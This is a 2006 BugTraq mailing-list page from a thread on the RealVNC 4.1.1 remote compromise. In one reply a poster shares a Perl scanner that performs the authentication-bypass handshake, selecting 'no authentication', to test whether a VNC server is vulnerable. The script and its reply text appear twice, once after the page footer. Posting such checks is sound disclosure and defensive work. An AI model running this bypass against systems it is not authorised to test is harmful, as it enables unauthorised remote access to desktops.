BugTraq
Back to list
|
Post reply
RE: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
May 18 2006 11:04PM
Krpata, Tyler (tkrpata bjs com)
(1 replies)
Here's a real quick vulnerability check in Perl...I think someone else
put out another scanner, but there was no source provided and it wasn't
working right for me.
------------------------------------------------------------------------
--------------------
#!/usr/bin/perl
# scan for OpenVNC 4.11 authentication bypass
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1] || 5900;
$host or die("$0 <host> <port>\n");
print "Connecting to $host:$port..."; $| = 1;
($sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',)) ? print "success!\n"
: die("failed\n");
#negotiate protocol
$sock->read($protocol_version,12);
print $sock $protocol_version;
print "Using protocol $protocol_version";
# get security types that we'll be ignoring
$sock->read($security_types,1);
$sock->read($hahaha,unpack('C',$security_types));
# choose no authentication
print $sock "\x01";
# we should get "0000" back
$sock->read($in,4);
if(unpack('I',$in)) { die("Not vulnerable\n") };
# client initialize
print $sock "\x01";
# if the server starts sending data we are in
$sock->read($in,4);
(unpack('I',$in)) ? print("Vulnerable!\n") : die("Not vulnerable\n") ;
exit;
[ reply ]
Re: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
May 20 2006 12:22AM
Matt Venzke (mvenzke gmail com)
(1 replies)
Re: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
Jun 05 2006 05:08PM
Tobias Kreidl (Tobias Kreidl NAU EDU)
(1 replies)
Re: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
Jun 05 2006 11:33PM
Kurt Seifried (bt seifried org)
(2 replies)
Re: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
Jun 07 2006 01:01AM
Bojan Zdrnja (bojan zdrnja gmail com)
Re: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
Jun 06 2006 10:10PM
Ray Van Dolson (rayvd digitalpath net)
(1 replies)
Re: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
Jun 07 2006 06:07PM
Jose Ramirez (jose ramirez dynet com mx)
Privacy Statement
Copyright 2010, SecurityFocus
put out another scanner, but there was no source provided and it wasn't
working right for me.
------------------------------------------------------------------------
--------------------
#!/usr/bin/perl
# scan for OpenVNC 4.11 authentication bypass
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1] || 5900;
$host or die("$0 <host> <port>\n");
print "Connecting to $host:$port..."; $| = 1;
($sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',)) ? print "success!\n"
: die("failed\n");
#negotiate protocol
$sock->read($protocol_version,12);
print $sock $protocol_version;
print "Using protocol $protocol_version";
# get security types that we'll be ignoring
$sock->read($security_types,1);
$sock->read($hahaha,unpack('C',$security_types));
# choose no authentication
print $sock "\x01";
# we should get "0000" back
$sock->read($in,4);
if(unpack('I',$in)) { die("Not vulnerable\n") };
# client initialize
print $sock "\x01";
# if the server starts sending data we are in
$sock->read($in,4);
(unpack('I',$in)) ? print("Vulnerable!\n") : die("Not vulnerable\n") ;
exit;
[ reply ]